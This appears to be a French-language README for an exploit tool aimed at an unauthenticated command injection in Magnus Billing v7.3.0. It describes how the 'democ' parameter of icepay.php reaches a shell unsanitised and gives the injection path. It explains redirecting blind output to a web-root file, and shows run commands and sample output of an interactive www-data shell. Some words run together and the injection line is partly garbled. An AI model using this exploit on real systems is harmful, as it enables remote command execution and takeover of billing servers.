
Vulnérabilité d'injection de commande non authentifiée dans Magnus Billing v7.3.0.
Vulnérabilité d'injection de commande sans authentification dans Magnus Billing v7.3.0. Le paramètre GET
democdansicepay.phpest passé directement à une fonction shell sans assainissement, permettant l'exécution arbitraire de commandes en tant qu'utilisateur du serveur web. L'injection est aveugle — la sortie n'est pas reflétée dans la réponse HTTP — donc cet exploit redirige la sortie de chaque commande vers un fichier dans la racine web et la récupère via HTTP.
/mbilling/lib/icepay/icepay.php?democ=;<commande>;out.txt).Si la cible utilise un chemin de racine web différent, ajustez
OUTPUT_FILEen haut du script.
python3 -m venv venv
source venv/bin/activate
python3 -m pip install requests prompt_toolkit
python3 exploit.py -t http://CIBLE
Exemple :
$ python3 exploit.py -t http://10.10.10.10
[*] Test d'exécution de commande...
[+] La cible est vulnérable ! Sortie : uid=33(www-data) gid=33(www-data) groups=33(www-data)
[+] Shell ouvert. Tapez 'exit' ou Ctrl+C pour quitter.
Shell> whoami
www-data